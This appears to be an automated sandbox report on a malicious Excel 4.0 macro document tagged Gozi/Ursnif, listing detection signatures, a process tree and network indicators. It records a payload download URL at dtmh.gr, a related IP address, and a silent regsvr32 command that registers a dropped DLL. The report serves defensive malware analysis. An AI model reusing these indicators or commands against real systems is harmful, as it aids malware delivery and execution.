Loading ...

Play interactive tourEdit tour

Analysis Report document-1411290183.xls

Overview

General Information

Sample Name:document-1411290183.xls
Analysis ID:324295
MD5:32a11b7a08798a31c2ecce5ff34de4da
SHA1:316cbd65065f682a134182f72517251b28daee3b
SHA256:25cfb8623367e8f73139b0163de1750283af61ec4d78e0c0c9d6bb0a8bbc6651
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7140 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6488 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1411290183.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x502a2:$s1: Excel
  • 0x5131d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1411290183.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7140, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 6488

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1411290183.xlsVirustotal: Detection: 34%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 1MB later: 114MB
    Source: global trafficDNS query: name: dtmh.gr
    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 78.46.235.88:443
    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 78.46.235.88:443
    Source: Joe Sandbox ViewIP Address: 78.46.235.88 78.46.235.88
    Source: unknownDNS traffic detected: queries for: dtmh.gr
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.office.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.onedrive.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://augloop.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cdn.entity.
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cortana.ai
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://cr.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://directory.services.
    Source: document-1411290183.xlsString found in binary or memory: https://dtmh.gr/ds/231120.gif
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://graph.windows.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://graph.windows.net/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://login.windows.local
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://management.azure.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://management.azure.com/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://messaging.office.com/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://officeapps.live.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://onedrive.live.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://outlook.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://outlook.office365.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://settings.outlook.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://tasks.office.com
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 98B0119A-1406-4C2B-A22D-9268E679C45C.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1411290183.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1411290183.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: document-1411290183.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal72.expl.evad.winXLS@3/7@1/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{ADB10135-613B-476D-A7E0-60DAF2E80E43} - OProcSessId.datJump to behavior
    Source: document-1411290183.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1411290183.xlsVirustotal: Detection: 34%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
